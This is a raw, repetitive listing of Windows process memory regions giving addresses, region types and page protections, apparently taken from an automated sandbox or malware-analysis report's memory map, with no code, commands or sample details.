|
page read and write
|
||
360000
|
unkown
|
page execute and read and write
|
||
380000
|
unkown
|
page read and write
|
||
486F000
|
stack
|
page read and write
|
||
3060000
|
unkown
|
page read and write
|
||
38E6000
|
unkown
|
page read and write
|
||
12CE1000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
5230000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
1B9E0000
|
unkown
|
page readonly
|
||
4490000
|
unkown
|
page readonly
|
||
2404000
|
unkown
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
830000
|
unkown
|
page read and write
|
||
532000
|
heap default
|
page read and write
|
||
5DBC000
|
unkown
|
page read and write
|
||
2AB0000
|
unkown
|
page readonly
|
||
837000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
280000
|
unkown
|
page write copy
|
||
637F000
|
unkown
|
page read and write
|
||
210000
|
heap private
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
8E2000
|
unkown image
|
page execute read
|
||
672E000
|
stack
|
page read and write
|
||
8CE000
|
unkown
|
page read and write
|
||
71D000
|
unkown
|
page read and write
|
||
2C2F000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
692000
|
unkown
|
page read and write
|
||
AC0000
|
heap default
|
page read and write
|
||
386000
|
heap default
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
A80000
|
unkown
|
page readonly
|
||
228F000
|
stack
|
page read and write
|
||
34DA000
|
unkown
|
page read and write
|
||
22E9000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
3A8000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
218F000
|
unkown
|
page read and write
|
||
200000
|
heap private
|
page execute and read and write
|
||
8C0000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
730000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
880000
|
unkown
|
page read and write
|
||
460000
|
unkown
|
page execute and read and write
|
||
690000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
80000
|
unkown
|
page readonly
|
||
5C0000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
830000
|
unkown
|
page read and write
|
||
2F5E000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page execute and read and write
|
||
186000
|
unkown
|
page execute and read and write
|
||
3BC000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
B00000
|
heap default
|
page read and write
|
||
4A20000
|
heap private
|
page read and write
|
||
F4000
|
heap private
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
7D80000
|
unkown
|
page read and write
|
||
2FAA000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
2F05000
|
unkown
|
page read and write
|
||
1B44C000
|
unkown
|
page read and write
|
||
38EC000
|
unkown
|
page read and write
|
||
22C9000
|
unkown
|
page read and write
|
||
34C7000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
23EF000
|
unkown
|
page read and write
|
||
3A2000
|
heap default
|
page read and write
|
||
2E3E000
|
unkown
|
page read and write
|
||
56D1000
|
unkown
|
page read and write
|
||
2E2B000
|
unkown
|
page read and write
|
||
387000
|
unkown
|
page read and write
|
||
38A6000
|
unkown
|
page read and write
|
||
5B7000
|
heap private
|
page read and write
|
||
5681000
|
unkown
|
page read and write
|
||
860000
|
unkown
|
page execute and read and write
|
||
AE4000
|
heap default
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
2B10000
|
unkown
|
page readonly
|
||
8E2000
|
unkown image
|
page execute read
|
||
6D0000
|
unkown
|
page read and write
|
||
C20000
|
unkown
|
page readonly
|
||
1B2A0000
|
unkown
|
page read and write
|
||
9D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
4B30000
|
unkown
|
page readonly
|
||
12E82000
|
unkown
|
page read and write
|
||
6A0000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
700000
|
unkown
|
page readonly
|
||
39F000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page read and write
|
||
3681000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
3871000
|
unkown
|
page read and write
|
||
34F0000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
3908000
|
unkown
|
page read and write
|
||
394F000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
38C9000
|
unkown
|
page read and write
|
||
55E0000
|
heap private
|
page read and write
|
||
5B1E000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
2F87000
|
unkown
|
page read and write
|
||
1B4C0000
|
unkown
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
79C5000
|
unkown
|
page read and write
|
||
7D40000
|
heap private
|
page read and write
|
||
56DF000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
3D9000
|
heap default
|
page read and write
|
||
56D4000
|
unkown
|
page read and write
|
||
A0000
|
unkown
|
page read and write
|
||
1C0000
|
unkown
|
page read and write
|
||
217000
|
unkown
|
page execute and read and write
|
||
380000
|
unkown
|
page read and write
|
||
7D80000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
8F2000
|
unkown image
|
page readonly
|
||
730000
|
unkown
|
page read and write
|
||
3C0000
|
heap private
|
page execute and read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
7D80000
|
unkown
|
page read and write
|
||
890000
|
unkown
|
page read and write
|
||
2291000
|
unkown
|
page read and write
|
||
3AC000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
544E000
|
unkown
|
page read and write
|
||
1B42D000
|
unkown
|
page read and write
|
||
1C74E000
|
unkown
|
page read and write
|
||
20C0000
|
unkown
|
page read and write
|
||
3877000
|
unkown
|
page read and write
|
||
384B000
|
unkown
|
page read and write
|
||
867000
|
unkown
|
page readonly
|
||
2EF7000
|
unkown
|
page read and write
|
||
AB0000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
20E0000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
2F37000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
80000
|
unkown
|
page readonly
|
||
4CD0000
|
heap private
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page read and write
|
||
320000
|
heap default
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
720000
|
unkown
|
page read and write
|
||
37D000
|
heap default
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
6D4000
|
unkown
|
page read and write
|
||
2EBF000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
8D0000
|
unkown
|
page read and write
|
||
4D30000
|
heap private
|
page execute and read and write
|
||
837000
|
unkown
|
page read and write
|
||
1D30000
|
unkown
|
page readonly
|
||
837000
|
unkown
|
page read and write
|
||
1EC0000
|
heap private
|
page execute and read and write
|
||
3291000
|
unkown
|
page read and write
|
||
2E9D000
|
unkown
|
page read and write
|
||
5A0000
|
unkown
|
page read and write
|
||
57B000
|
heap default
|
page read and write
|
||
1CB70000
|
heap private
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
900000
|
unkown
|
page read and write
|
||
393E000
|
unkown
|
page read and write
|
||
C0000
|
heap default
|
page read and write
|
||
B3000
|
unkown
|
page execute and read and write
|
||
8D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
1B4DE000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
1C953000
|
heap private
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
3D38000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
2F27000
|
unkown
|
page read and write
|
||
568E000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
205E000
|
unkown
|
page read and write
|
||
6A16000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
58B0000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
3B0000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
8E0000
|
unkown image
|
page readonly
|
||
3B9000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
3B2000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
580000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
2F8D000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
13D0000
|
heap private
|
page read and write
|
||
16D000
|
unkown
|
page execute and read and write
|
||
590000
|
unkown
|
page readonly
|
||
22FC000
|
unkown
|
page readonly
|
||
730000
|
unkown
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
4260000
|
heap private
|
page read and write
|
||
857000
|
heap private
|
page read and write
|
||
8E0000
|
unkown image
|
page readonly
|
||
1CBF0000
|
unkown
|
page read and write
|
||
2EFB000
|
unkown
|
page read and write
|
||
408000
|
stack
|
page read and write
|
||
4F1F000
|
stack
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page readonly
|
||
170000
|
unkown
|
page read and write
|
||
1A7000
|
unkown
|
page execute and read and write
|
||
B58000
|
heap default
|
page read and write
|
||
306B000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
12E20000
|
unkown
|
page read and write
|
||
726000
|
unkown
|
page read and write
|
||
2C0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
A30000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
3A7000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page read and write
|
||
A79000
|
heap private
|
page read and write
|
||
38A0000
|
unkown
|
page read and write
|
||
1D85000
|
heap private
|
page read and write
|
||
5000000
|
heap private
|
page read and write
|
||
3AD000
|
unkown
|
page read and write
|
||
350F000
|
unkown
|
page read and write
|
||
1D50000
|
unkown
|
page readonly
|
||
1C8FE000
|
unkown
|
page read and write
|
||
15C000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
5694000
|
unkown
|
page read and write
|
||
61B0000
|
heap private
|
page execute and read and write
|
||
730000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
8D0000
|
unkown
|
page read and write
|
||
8E2000
|
unkown image
|
page execute read
|
||
2E0C000
|
unkown
|
page read and write
|
||
5A0000
|
unkown
|
page read and write
|
||
563D000
|
unkown
|
page read and write
|
||
1D67000
|
heap private
|
page read and write
|
||
7FF00170000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
7D4000
|
unkown
|
page read and write
|
||
22F0000
|
unkown
|
page readonly
|
||
2F23000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
637E000
|
unkown
|
page read and write | page guard
|
||
407000
|
heap default
|
page read and write
|
||
33F8000
|
unkown
|
page read and write
|
||
450000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
390000
|
unkown
|
page read and write
|
||
38A3000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
5736000
|
unkown
|
page read and write
|
||
2C0000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
800000
|
heap private
|
page read and write
|
||
745000
|
unkown
|
page read and write
|
||
A70000
|
heap private
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
651E000
|
unkown
|
page read and write
|
||
2268000
|
unkown
|
page read and write
|
||
3B2000
|
unkown
|
page read and write
|
||
2100000
|
heap private
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
1CA000
|
unkown
|
page execute and read and write
|
||
35E000
|
heap default
|
page read and write
|
||
390000
|
unkown
|
page read and write
|
||
34DD000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
720000
|
unkown
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
1BCA0000
|
unkown
|
page readonly
|
||
1CBF0000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
1CD0000
|
unkown
|
page readonly
|
||
74A000
|
unkown
|
page read and write
|
||
2020000
|
unkown
|
page readonly
|
||
54E000
|
heap default
|
page read and write
|
||
24C0000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
3DAF000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
29F0000
|
heap private
|
page execute and read and write
|
||
690000
|
unkown
|
page read and write
|
||
EA0000
|
unkown
|
page readonly
|
||
218E000
|
unkown
|
page read and write | page guard
|
||
2EDE000
|
unkown
|
page read and write
|
||
56ED000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
23F0000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
4A2E000
|
unkown
|
page read and write
|
||
7FF00040000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
380000
|
unkown
|
page read and write
|
||
3D1000
|
heap default
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
396D000
|
unkown
|
page read and write
|
||
3B3000
|
unkown
|
page read and write
|
||
2A5D000
|
unkown
|
page read and write
|
||
2C08000
|
unkown
|
page read and write
|
||
51B000
|
heap default
|
page read and write
|
||
1B4A6000
|
unkown
|
page read and write
|
||
2F19000
|
unkown
|
page read and write
|
||
5190000
|
unkown
|
page readonly
|
||
590000
|
unkown
|
page read and write
|
||
A40000
|
unkown
|
page read and write
|
||
3AF000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
350C000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
3942000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
2B10000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
51DE000
|
unkown
|
page read and write
|
||
685E000
|
stack
|
page read and write
|
||
2410000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
519F000
|
unkown
|
page read and write
|
||
2340000
|
unkown
|
page readonly
|
||
8E0000
|
unkown image
|
page readonly
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
1C6000
|
unkown
|
page execute and read and write
|
||
4ADD000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
770000
|
unkown
|
page readonly
|
||
6B0000
|
unkown
|
page read and write
|
||
440E000
|
unkown
|
page read and write
|
||
497E000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
276000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page read and write
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
49C0000
|
heap private
|
page read and write
|
||
55E5000
|
heap private
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
559D000
|
unkown
|
page read and write
|
||
FFFDF000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
1B4C9000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
3C9000
|
unkown
|
page read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
110000
|
unkown
|
page read and write
|
||
835000
|
unkown
|
page read and write
|
||
1C7EE000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
6A0000
|
unkown
|
page read and write
|
||
21B000
|
unkown
|
page execute and read and write
|
||
4CE000
|
heap default
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
3B1000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page readonly
|
||
22CA000
|
unkown
|
page read and write
|
||
3C6000
|
unkown
|
page read and write
|
||
B2A000
|
heap default
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
29BA000
|
heap private
|
page execute and read and write
|
||
12BFC000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
5B60000
|
unkown
|
page readonly
|
||
436E000
|
unkown
|
page read and write
|
||
56D1000
|
unkown
|
page read and write
|
||
369C000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
5680000
|
unkown
|
page read and write
|
||
5E20000
|
unkown
|
page readonly
|
||
3AA000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
38BD000
|
unkown
|
page read and write
|
||
5580000
|
unkown
|
page read and write
|
||
12BD1000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
2F1D000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
2E96000
|
unkown
|
page read and write
|
||
B7E000
|
unkown
|
page read and write
|
||
487000
|
heap default
|
page read and write
|
||
735000
|
unkown
|
page read and write
|
||
5DC0000
|
unkown
|
page readonly
|
||
837000
|
unkown
|
page read and write
|
||
8F2000
|
unkown image
|
page readonly
|
||
830000
|
unkown
|
page read and write
|
||
402000
|
heap default
|
page read and write
|
||
3B2000
|
unkown
|
page read and write
|
||
1C06000
|
unkown
|
page read and write
|
||
4410000
|
unkown
|
page readonly
|
||
380000
|
unkown
|
page read and write
|
||
7FF00265000
|
unkown
|
page execute and read and write
|
||
55DE000
|
unkown
|
page read and write
|
||
2F8A000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
1BAE0000
|
heap private
|
page read and write
|
||
2F3D000
|
unkown
|
page read and write
|
||
96D000
|
unkown
|
page read and write
|
||
6120000
|
unkown
|
page read and write
|
||
3884000
|
unkown
|
page read and write
|
||
900000
|
unkown
|
page readonly
|
||
6D0000
|
unkown
|
page read and write
|
||
1AC30000
|
unkown
|
page read and write
|
||
4BE0000
|
unkown
|
page write copy
|
||
FFFDF000
|
unkown
|
page read and write
|
||
1D00000
|
unkown
|
page read and write
|
||
8B0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
190000
|
heap private
|
page read and write
|
||
215000
|
unkown
|
page execute and read and write
|
||
3BF000
|
unkown
|
page read and write
|
||
8E0000
|
unkown image
|
page readonly
|
||
554E000
|
unkown
|
page read and write
|
||
920000
|
unkown
|
page read and write
|
||
667E000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
2EFF000
|
unkown
|
page read and write
|
||
5B8E000
|
unkown
|
page read and write
|
||
3924000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
2BCF000
|
unkown
|
page read and write
|
||
231B000
|
unkown
|
page readonly
|
||
850000
|
heap private
|
page read and write
|
||
8D6000
|
unkown
|
page read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
830000
|
unkown
|
page read and write
|
||
3111000
|
unkown
|
page read and write
|
||
3A9000
|
heap default
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
241A000
|
unkown
|
page read and write
|
||
3F7000
|
heap default
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
723000
|
unkown
|
page read and write
|
||
592000
|
unkown
|
page read and write
|
||
245000
|
unkown
|
page read and write
|
||
56D1000
|
unkown
|
page read and write
|
||
175000
|
unkown
|
page read and write | page guard
|
||
695000
|
unkown
|
page read and write
|
||
1E9F000
|
unkown
|
page read and write
|
||
8F2000
|
unkown image
|
page readonly
|
||
385000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page readonly
|
||
8E0000
|
unkown image
|
page readonly
|
||
6B5000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
3AC000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
9AE000
|
unkown
|
page read and write
|
||
34E3000
|
unkown
|
page read and write
|
||
2BCE000
|
unkown
|
page read and write | page guard
|
||
4F0000
|
heap default
|
page read and write
|
||
1BB70000
|
heap private
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
5CCE000
|
stack
|
page read and write
|
||
4FC0000
|
heap private
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
22E4000
|
unkown
|
page read and write
|
||
2EA7000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
A50000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
350000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page execute and read and write
|
||
837000
|
unkown
|
page read and write
|
||
1BC4000
|
heap private
|
page read and write
|
||
33BB000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
8E2000
|
unkown image
|
page execute read
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
3298000
|
unkown
|
page read and write
|
||
4EF000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
41D000
|
heap default
|
page read and write
|
||
643E000
|
stack
|
page read and write
|
||
1BC0000
|
heap private
|
page read and write
|
||
24E7000
|
unkown
|
page read and write
|
||
840000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page read and write
|
||
34F9000
|
unkown
|
page read and write
|
||
12BD5000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
880000
|
unkown
|
page readonly
|
||
5602000
|
heap private
|
page read and write
|
||
22D6000
|
unkown
|
page read and write
|
||
3A5000
|
unkown
|
page read and write
|
||
38B8000
|
unkown
|
page read and write
|
||
1C940000
|
heap private
|
page read and write
|
||
6260000
|
unkown
|
page readonly
|
||
48FF000
|
unkown
|
page read and write
|
||
7D62000
|
heap private
|
page read and write
|
||
522F000
|
unkown
|
page read and write
|
||
390000
|
unkown
|
page read and write
|
||
13BF000
|
unkown
|
page read and write
|
||
2AA6000
|
unkown
|
page read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
48DE000
|
unkown
|
page read and write
|
||
3175000
|
unkown
|
page read and write
|
||
8F2000
|
unkown image
|
page readonly
|
||
28E6000
|
unkown
|
page read and write
|
||
6C00000
|
heap private
|
page read and write
|
||
2EEB000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
290000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page read and write
|
||
280000
|
heap private
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
34F6000
|
unkown
|
page read and write
|
||
4A0E000
|
unkown
|
page read and write
|
||
58AE000
|
stack
|
page read and write
|
||
22F7000
|
unkown
|
page readonly
|
||
6D1000
|
unkown
|
page read and write
|
||
1BC9E000
|
unkown
|
page read and write
|
||
727000
|
unkown
|
page read and write
|
||
310B000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
8F2000
|
unkown image
|
page readonly
|
||
1AB000
|
unkown
|
page execute and read and write
|
||
385000
|
unkown
|
page read and write
|
||
470000
|
unkown
|
page readonly
|
||
2E8D000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
900000
|
unkown
|
page readonly
|
||
720000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
56ED000
|
unkown
|
page read and write
|
||
1D80000
|
heap private
|
page read and write
|
||
3191000
|
unkown
|
page read and write
|
||
56D4000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
840000
|
unkown
|
page read and write
|
||
2F6B000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
4B2C000
|
stack
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
9E0000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
653E000
|
stack
|
page read and write
|
||
3859000
|
unkown
|
page read and write
|
||
5762000
|
unkown
|
page read and write
|
||
164000
|
unkown
|
page read and write
|
||
A2C000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
1D64000
|
heap private
|
page read and write
|
||
260000
|
heap private
|
page execute and read and write
|
||
6A0000
|
unkown
|
page read and write
|
||
431E000
|
unkown
|
page read and write
|
||
9B0000
|
unkown
|
page read and write
|
||
5B31000
|
heap private
|
page read and write
|
||
1D20000
|
unkown
|
page read and write
|
||
2EB4000
|
unkown
|
page read and write
|
||
24BD000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
57F000
|
heap default
|
page read and write
|
||
38EF000
|
unkown
|
page read and write
|
||
514000
|
heap default
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
800E000
|
stack
|
page read and write
|
||
49BD000
|
unkown
|
page read and write
|
||
4A42000
|
heap private
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
522E000
|
unkown
|
page read and write | page guard
|
||
830000
|
unkown
|
page read and write
|
||
347F000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
1CBF0000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
F0000
|
heap private
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
448E000
|
stack
|
page read and write
|
||
8A0000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
7CE000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
34F3000
|
unkown
|
page read and write
|
||
910000
|
unkown
|
page read and write
|
||
69B1000
|
unkown
|
page read and write
|
||
110000
|
heap private
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
4BDE000
|
unkown
|
page read and write
|
||
5B20000
|
heap private
|
page read and write
|
||
29B0000
|
heap private
|
page execute and read and write
|
||
2F58000
|
unkown
|
page read and write
|
||
423E000
|
unkown
|
page read and write
|
||
524A000
|
unkown
|
page read and write
|
||
6220000
|
heap private
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
2E0F000
|
unkown
|
page read and write
|
||
832000
|
unkown
|
page read and write
|
||
7F0000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
2F0C000
|
unkown
|
page read and write
|
||
B80000
|
unkown
|
page readonly
|
||
28B0000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
BD000
|
unkown
|
page execute and read and write
|
||
699000
|
unkown
|
page read and write
|
||
A60000
|
unkown
|
page read and write
|
||
4190000
|
unkown
|
page readonly
|
||
690000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
4A9E000
|
unkown
|
